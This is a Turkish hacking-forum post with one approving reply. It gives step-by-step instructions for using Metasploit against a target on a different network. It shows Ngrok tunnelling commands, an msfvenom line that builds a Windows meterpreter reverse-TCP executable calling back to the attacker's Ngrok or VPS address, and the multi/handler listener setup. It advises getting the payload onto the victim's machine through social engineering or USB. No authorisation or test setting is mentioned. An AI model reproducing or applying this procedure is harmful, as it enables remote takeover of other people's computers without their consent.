Metasploit ile Aynı Ağda Olmadan Payload

PHP Man

Üye
Katılım
1 Ocak 2025
Konular
29
Mesajlar
46
Tepkime puanı
15
TL
75
Herkese merhaba,
Bu rehberde, Metasploit ile aynı ağda olmadan payload kullanımı hakkında detaylı bilgiler ve adım adım bir açıklama sunacağız.

Metasploit ile Farklı Ağlarda Çalışma Mantığı​

Farklı ağlarda çalışmak için temel prensip, hedef cihazın Metasploit sisteminize geri bağlanmasını sağlamaktır. Bu işlem için kullanılan yöntemler:

  1. Port Yönlendirme (Port Forwarding): Hedef cihazın internete açık bir IP adresine bağlanmasını sağlamak.
  2. VPN veya Proxy Kullanımı: Hedef cihazla arada bir bağlantı tüneli oluşturmak.
  3. Cloud Sunucular (VPS): Payloadların geri bağlantı yapabileceği bir sunucu kurmak.

Gerekli Araçlar ve Hazırlıklar​

Bu süreçte ihtiyacınız olacak araçlar:

  • Metasploit Framework
  • Ngrok veya benzeri bir tünelleme aracı
  • Cloud Sunucusu (Opsiyonel)
  • Port Yönlendirme Ayarları

Adım 1: Ngrok veya Sunucu Ayarları​

Ngrok, localhost üzerinde çalışan bir servisi internete açık bir URL’ye yönlendirebilir.
Ngrok, localhost üzerinde çalışan bir servisi internete açık bir URL’ye yönlendirebilir.

1) üzerinden ücretsiz bir hesap oluşturun ve API anahtarınızı alın.

2) Ngrok’u indirip yükleyin:
Kod:
./ngrok authtoken [API_ANAHTARINIZ]
./ngrok tcp 4444

3) Ngrok, dışarıya açık bir IP ve port sağlayacaktır. Bu bilgiyi kaydedin.

Adım 2: Payload Oluşturma​

Metasploit’te farklı ağlarda çalışacak bir payload oluşturmak için:
Kod:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Ngrok_IP veya VPS_IP] LPORT=[Ngrok_Port] -f exe > payload.exe
  • LHOST: Ngrok’un size verdiği IP veya VPS IP adresiniz.
  • LPORT: Ngrok veya VPS üzerinden belirttiğiniz port numarası.
Payload’ı oluşturduktan sonra hedef cihaza gönderin. Bunun için sosyal mühendislik veya USB taşıma yöntemleri kullanılabilir.

Adım 3: Metasploit Ayarlarını Yapılandırma​

Metasploit’te ilgili handler’ı başlatın:
Kod:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT [Ngrok_Port]
exploit
Bu ayarlar, payload geri bağlantı yaptığında Metasploit üzerinden oturum açmanızı sağlar.

Adım 4: Test ve Güvenlik Kontrolleri​

Hedef cihaz, payload çalıştırıldığında, Metasploit konsolunda bir oturum açılacaktır:
Kod:
meterpreter > sysinfo
Bu komutla hedef cihazın işletim sistemi ve bilgilerini görebilirsiniz.
 

io

👑
Yetkili
Katılım
30 Temmuz 2024
Konular
39
Mesajlar
85
Tepkime puanı
50
TL
70
Güzel konu eline sağlık
 
Son düzenleme:
Üst Alt